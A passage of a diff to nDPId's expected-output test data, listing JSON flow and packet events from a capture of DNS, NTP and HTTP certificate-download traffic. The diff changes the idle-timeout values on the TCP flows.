2011","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=wdcp.microsoft.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"81:41:67:66:7E:A9:1B:AA:61:3D:DE:D1:41:E7:17:13:CE:C4:3B:22"}} 
00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1626168077619,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":150,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":150,"pkt_l4_len":116,"thread_ts_msec":1626168077619,"pkt":"8BiYFWV8WNVuaKQACABFAACITIkAAHkRIqsICAgIwKgBeQA12RoAdB3yXZOBgAABAAAAAQAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AABBAAHAEwAGAAEAAAKpADQGbjBkc2NiwBgKaG9zdG1hc3RlcgZha2FtYWkDY29tAGDtWc8AAAPoAAAD6AAAA+gAAAcI"} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077619,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1626168077619,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":55578,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":65,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077620,"flow_last_seen":1626168077620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077620,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1626168077620,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077620,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KYAFDHEa2yAAAAALAC\/\/\/SXgAAAgQFtAEDAwYBAQgKPdH4\/AAAAAAEAgAA"} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1626168077622,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1626168077622,"pkt":"8BiYFWV8WNVuaKQACABFAADmBoMAAHgRaVMICAgIwKgBeQA14zEA0sNDCy+BgAABAAQAAAAAA3d3dwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAosACMDd3d3CW1pY3Jvc29mdAdjb20tYy0zB2VkZ2VrZXkDbmV0AMAvAAUAAQAAAyUANwN3d3cJbWljcm9zb2Z0B2NvbS1jLTMHZWRnZWtleQNuZXQLZ2xvYmFscmVkaXIGYWthZG5zwE3AXgAFAAEAAAMDABkGZTEzNjc4BGRzY2IKYWthbWFpZWRnZcBNwKEAAQABAAAAEwAEAhYh6w=="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077590,"flow_last_seen":1626168077622,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1626168077622,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":58161,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": 
{"query":"www.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077632,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pgVbXIGxxGts6AS\/oilegAAAgQFtAQCCAqgBBfWPdH4\/AEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077632,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KYAFDHEa2zFW1yB4AQCArKugAAAQEICj3R+QegBBfW"} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077620,"flow_last_seen":1626168077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077632,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} 
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1626168077633,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1626168077633,"pkt":"8BiYFWV8WNVuaKQACABFAABYGXsAAHgRVukICAgIwKgBeQA11SEAREvAQG+BgAABAAEAAAAABmUxMzY3OARkc2NiCmFrYW1haWVkZ2UDbmV0AAABAAHADAABAAEAAAATAAQCFiHr"} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":75,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077604,"flow_last_seen":1626168077633,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1626168077633,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":54561,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"e13678.dscb.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.22.33.235"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} 
+01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077620,"flow_last_seen":1626168077654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53912,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pki\/certs\/MicRooCerAut2011_2011_03_22.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077660,"flow_last_seen":1626168077660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1626168077660,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1626168077660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1626168077660,"pkt":"WNVuaKQA8BiYFWV8CABFAABAAABAAEAGVJbAqAF5AhYh69KZAFBWi1SkAAAAALAC\/\/+bzgAAAgQFtAEDAwYBAQgKPdH5IAAAAAAEAgAA"} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1626168077670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1626168077670,"pkt":"8BiYFWV8WNVuaKQACABFAAA8AABAADkGW5oCFiHrwKgBeQBQ0pnFRlw1VotUpaAS\/ohpIwAAAgQFtAQCCAqAXqM6PdH5IAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} 
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} 
+00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1626168077735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1626168077735,"pkt":"WNVuaKQA8BiYFWV8CABFAABCGz0AAEARjT3AqAF5CAgICP69ADUALrrFTnABAAABAAAAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAE="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -103,84 +103,84 @@ 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1626168077750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077750,"pkt":"WNVuaKQA8BiYFWV8CABFAABMdJwAAEAR+uvAqAF5Ef02+8BAAHsAOBCpIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 